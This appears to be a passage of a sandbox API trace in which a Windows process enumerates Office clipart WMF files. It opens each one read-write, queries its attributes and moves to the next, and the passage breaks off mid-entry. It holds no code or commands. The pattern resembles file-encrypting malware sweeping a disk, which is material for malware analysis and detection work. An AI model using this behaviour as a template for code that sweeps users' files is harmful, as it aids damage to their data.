[0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0102.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.629] AreFileApisANSI () returned 1 [0102.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0102.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 69 [0102.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.630] GetFileType (hFile=0x33c) returned 0x1 [0102.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.630] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.630] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.630] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.630] CloseHandle (hObject=0x33c) returned 1 [0102.631] AreFileApisANSI () returned 1 [0102.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 69 [0102.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.631] GetFileType (hFile=0x33c) returned 0x1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.631] CloseHandle (hObject=0x33c) returned 1 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.632] AreFileApisANSI () returned 1 [0102.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 69 [0102.632] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30c2)) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.633] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00262_.WMF", cAlternateFileName="")) returned 1 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.633] AreFileApisANSI () returned 1 [0102.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0102.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.634] AreFileApisANSI () returned 1 [0102.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 69 [0102.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.634] GetFileType (hFile=0x33c) returned 0x1 [0102.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.634] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.634] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.635] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.635] CloseHandle (hObject=0x33c) returned 1 [0102.802] AreFileApisANSI () returned 1 [0102.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0102.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 69 [0102.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.802] GetFileType (hFile=0x33c) returned 0x1 [0102.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.803] CloseHandle (hObject=0x33c) returned 1 [0102.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.803] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9fc)) returned 1 [0102.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1678, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00265_.WMF", cAlternateFileName="")) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.803] AreFileApisANSI () returned 1 [0102.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.804] GetFileType (hFile=0x33c) returned 0x1 [0102.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.805] CloseHandle (hObject=0x33c) returned 1 [0102.805] AreFileApisANSI () returned 1 [0102.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0102.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 69 [0102.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.805] GetFileType (hFile=0x33c) returned 0x1 [0102.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.806] CloseHandle (hObject=0x33c) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, 